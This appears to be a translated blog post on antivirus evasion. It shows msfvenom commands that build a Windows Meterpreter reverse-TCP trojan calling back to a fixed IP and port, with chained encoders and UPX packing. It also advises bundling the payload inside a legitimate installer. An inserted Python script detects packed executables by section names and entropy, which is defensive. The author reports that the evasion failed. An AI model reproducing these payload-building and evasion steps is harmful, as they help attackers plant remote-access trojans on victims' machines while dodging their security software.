First, generate a simple trojan.
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/meterpreter/reverse_tcp lhosts=61.139.2.130 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3333_10.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of cmd/echo
cmd/echo succeeded with size 354 (iteration=0)
cmd/echo succeeded with size 354 (iteration=1)
cmd/echo succeeded with size 354 (iteration=2)
cmd/echo succeeded with size 354 (iteration=3)
cmd/echo succeeded with size 354 (iteration=4)
cmd/echo succeeded with size 354 (iteration=5)
cmd/echo succeeded with size 354 (iteration=6)
cmd/echo succeeded with size 354 (iteration=7)
cmd/echo succeeded with size 354 (iteration=8)
cmd/echo succeeded with size 354 (iteration=9)
cmd/echo chosen with final size 354
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: cmd_echo_113_3333_10.exe
I don't even need to test this one: never mind 360, it can't even get past the antivirus built into Windows. Let's throw it into ThreatBook (微步) and see what we get.
The most predictable episode ever.
This time let's run it through a few more encoding passes and see.
┌──(kali㉿kali)-[~]
└─$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=61.139.2.130 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o payload2.0.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai succeeded with size 705 (iteration=12)
x86/shikata_ga_nai succeeded with size 732 (iteration=13)
x86/shikata_ga_nai succeeded with size 759 (iteration=14)
x86/shikata_ga_nai succeeded with size 786 (iteration=15)
x86/shikata_ga_nai succeeded with size 813 (iteration=16)
x86/shikata_ga_nai succeeded with size 840 (iteration=17)
x86/shikata_ga_nai succeeded with size 867 (iteration=18)
x86/shikata_ga_nai succeeded with size 894 (iteration=19)
x86/shikata_ga_nai chosen with final size 894
Payload size: 894 bytes
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 1857 (iteration=0)
x86/alpha_upper succeeded with size 3783 (iteration=1)
x86/alpha_upper succeeded with size 7635 (iteration=2)
x86/alpha_upper succeeded with size 15339 (iteration=3)
x86/alpha_upper succeeded with size 30747 (iteration=4)
x86/alpha_upper succeeded with size 61563 (iteration=5)
x86/alpha_upper succeeded with size 123194 (iteration=6)
x86/alpha_upper succeeded with size 246456 (iteration=7)
x86/alpha_upper succeeded with size 492979 (iteration=8)
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
x86/countdown succeeded with size 48 (iteration=2)
x86/countdown succeeded with size 64 (iteration=3)
x86/countdown succeeded with size 80 (iteration=4)
x86/countdown succeeded with size 96 (iteration=5)
x86/countdown succeeded with size 112 (iteration=6)
x86/countdown succeeded with size 128 (iteration=7)
x86/countdown succeeded with size 144 (iteration=8)
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: payload2.0.exe
x86/alpha_upper succeeded with size 986027 (iteration=9)
x86/alpha_upper chosen with final size 986027
Payload size: 986027 bytes
Although it isn't killed the moment it lands on disk, it still can't run; as soon as it executes it is flagged as a virus.
So let's try packing it with UPX.
Packing
A packer is a tool that compresses (and possibly encrypts) an executable and embeds a decompression stub in it; when the packed file runs, the stub rebuilds the original program from the compressed data and executes it.
I'm using the upx that ships with Kali.
┌──(root㉿kali)-[/home/kali]
└─# upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.4       Markus Oberhumer, Laszlo Molnar & John Reiser    May 9th 2024

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
Still detected? 360, you rascal.
360 is still too strong; I gave it everything and couldn't beat it.
Looks like I need to go away and hone my skills some more before I can take on Lord 360.
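From the defender's side, the packing described above is exactly what triage tooling looks for before a binary ever runs. The script below is an added example, not code from the original post or from UPX: it parses the PE section table by hand (no pefile dependency) and flags the two cheapest indicators, UPX's own section names and sections whose content is near-random (compressed or encrypted data), which is why a packed stub alone does not get past a scanner. The sample PE blobs are constructed inside the code and are not real executables.

```python
import math
import random
import struct
from collections import Counter
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".UPX0", b".UPX1"}
HIGH_ENTROPY = 7.0  # bits per byte; compressed or encrypted data sits close to 8.0

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant data, about 8.0 for random data."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every section, parsing the PE headers by hand."""
    if image[:2] != b"MZ" or len(image) < 0x40:
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # 20-byte COFF file header
    num_sections, opt_size = struct.unpack_from("<H12xH", image, coff + 2)
    table = coff + 20 + opt_size             # section table follows the optional header
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        yield name.rstrip(b"\0"), image[raw_ptr:raw_ptr + raw_size]

def packer_indicators(image: bytes) -> dict:
    """Cheap triage heuristics: UPX section names and near-random section content."""
    found = {"upx_names": [], "high_entropy": []}
    for name, raw in pe_sections(image):
        if name in UPX_SECTION_NAMES:
            found["upx_names"].append(name.decode())
        if raw and shannon_entropy(raw) >= HIGH_ENTROPY:
            found["high_entropy"].append(name.decode())
    found["packed_likely"] = bool(found["upx_names"] or found["high_entropy"])
    return found

def build_sample_pe(sections) -> bytes:
    """Constructed, minimal PE-shaped blob for offline testing; it is not a runnable program."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)  # i386, no optional header
    table, body, ptr = b"", b"", e_lfanew + 4 + 20 + 40 * len(sections)
    for name, raw in sections:
        table += struct.pack("<8sIIII", name, len(raw), ptr, len(raw), ptr) + b"\0" * 16
        body, ptr = body + raw, ptr + len(raw)
    return dos + b"PE\0\0" + coff + table + body
random.seed(1)  # deterministic stand-in for compressed data (constructed sample)
PACKED_SAMPLE = build_sample_pe([(b"UPX0", b""), (b"UPX1", bytes(random.getrandbits(8) for _ in range(4096)))])
PLAIN_SAMPLE = build_sample_pe([(b".text", b"\x90" * 4096)])
```

Real UPX output can be renamed or re-sectioned to dodge the name check, which is why the entropy heuristic is the one worth keeping in a pipeline.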
Bundling with an installer
There is actually one more evasion approach: bundling the payload with an installer, something like Huorong's installer.
[Note] Metasploit ships with a program template for bundling trojans, located at data/templates/template.exe. Although this template is updated frequently, it remains a prime focus for the major antivirus vendors. For better evasion, pick a program of your own to bundle here.
But in theory this kind of evasion isn't as effective as a UPX packer, so I didn't test it (definitely not because I'm lazy).
The truth is that these AV vendors aren't pushovers: practically every evasion technique you can find publicly no longer evades anything, and tools like these are specifically watched for, so in the end you have to write your own.